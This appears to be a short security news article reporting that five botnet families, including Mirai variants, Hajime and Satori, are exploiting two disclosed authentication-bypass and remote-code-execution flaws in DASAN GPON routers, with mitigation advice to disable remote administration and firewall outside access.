Just after the revelation of the two critical vulnerabilities in GPON router, at least 5 botnet families are found exploiting the flaws to build an army of million devices.
Security researchers from Chinese-based cybersecurity firm Qihoo 360 Netlab have found 5 botnet families, including Mettle, Muhstik, Mirai, Hajime, and Satori, using the GPON exploit.
Gigabit-capable Passive Optical Network (GPON) routers manufactured by South Korea-based DASAN Zhone Solutions have been found vulnerable to an authentication bypass (CVE-2018-10561) and a root-RCE (CVE-2018-10562) flaws that allows remote attackers to have full control of the device.
As soon as the details of the vulnerabilities were disclosed, 360 Netlab researchers have alerted about the threat actors which utilize both the flaws to hack and add the vulnerable routers into their botnet malware networks.
The researchers have published a new report, explaining the 5 botnet families actively exploiting these issues:
Mettle Botnet : Command-and-control panel and the scanner of this botnet is hosted on a server residing in Vietnam. Attackers have been utilizing an open-sourced Mettle attack module to implant malware on vulnerable routers.
Muhstik Botnet : This botnet was first discovered last week while it was actively exploiting a critical Drupal flaw, and now the latest version of Muhstik has been upgraded to exploit GPON vulnerabilities, along with flaws in JBOSS and DD-WRT firmware.
Mirai Botnet (new variants) : GPON exploit has also been integrated into a few new variants of the infamous Mirai IoT botnet, which came out first and open-sourced in 2016 after it was used to launch record-breaking DDoS attacks.
Hajime Botnet : An IoT botnet which was found adding GPON exploit to its code to target hundreds of thousands of home routers.
Satori Botnet : The infamous botnet also called as Okiru that infected 260,000 devices within 12 hours last year has also been observed to include GPON exploit in its latest variant.
The researchers who discovered GPON vulnerabilities have already reported the issues to the router manufacturer, but the company hasn’t released any fixes.
To make things worse, a working proof-of-concept (PoC) exploit for GPON router vulnerabilities has been made available to the public, which makes it easier for any hacker.
Until the company releases an official patch the users can protect their devices by disabling remote administration rights and using a firewall to prevent outside access from the public Internet.
Making these changes to your routers would limit the access to the local network only, within your Wi-Fi range and effectively reduces the attack by eliminating remote attackers.
The users must either wait for official fixes by the router manufacturer or apply changes manually if possible.
Technical Writer, Blogger,